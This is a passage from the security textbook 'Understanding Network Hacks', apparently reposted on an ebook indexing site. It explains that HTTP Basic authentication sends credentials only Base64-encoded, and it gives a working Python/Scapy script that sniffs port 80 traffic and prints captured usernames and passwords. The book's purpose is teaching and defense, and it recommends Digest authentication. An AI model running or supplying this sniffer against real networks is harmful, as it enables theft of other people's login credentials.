Understanding Network Hacks by Bastian Ballmann

Author:Bastian Ballmann
Language: eng
Format: epub
Publisher: Springer Berlin Heidelberg, Berlin, Heidelberg

7.7 HTTP-Auth Sniffing

Most HTTP authentications are running in the so called Basic mode. A lot of administrators do not even know that the login data is transferred in plaintext when selecting this method, because it’s only encoded with Base64 before send over the net. A short script should demonstrate how easy it is for an attacker to grab all of such HTTP authentications.

1 #!/usr/bin/python

2

3 import re

4 from base64 import b64decode

5 from scapy.all import sniff

6

7 dev = "wlan0"

8

9 def handle_packet(packet):

10 tcp = packet.getlayer("TCP")

11 match = re.search(r"Authorization: Basic (.+)",

12 str(tcp.payload))

13

14 if match:

15 auth_str = b64decode(match.group(1))

16 auth = auth_str.split(":")

17 print "User: " + auth[0] + " Pass: " + auth[1]

18

19 sniff(iface=dev,

20 store=0,

21 filter="tcp and port 80",

22 prn=handle_packet)

Once more we use the much loved Scapy function sniff to read the HTTP traffic, extract the TCP layer in the function handle_packet() to access the real payload. In the payload we search for the string Authorization: Basic and cut the following Base64 string with the help of a regular expression. If this was successful the string gets decoded and split by the colon into username and password. That’s all it takes to circumvent HTTP-Basic-Auth! So do yourself a favor and use Digest-Authentication to protect your web applications with HTTP Auth!

Download

Copyright Disclaimer:
This site does not store any files on its server. We only index and link to content provided by other sites. Please contact the content providers to delete copyright contents if any and email us, we'll remove relevant links or contents immediately.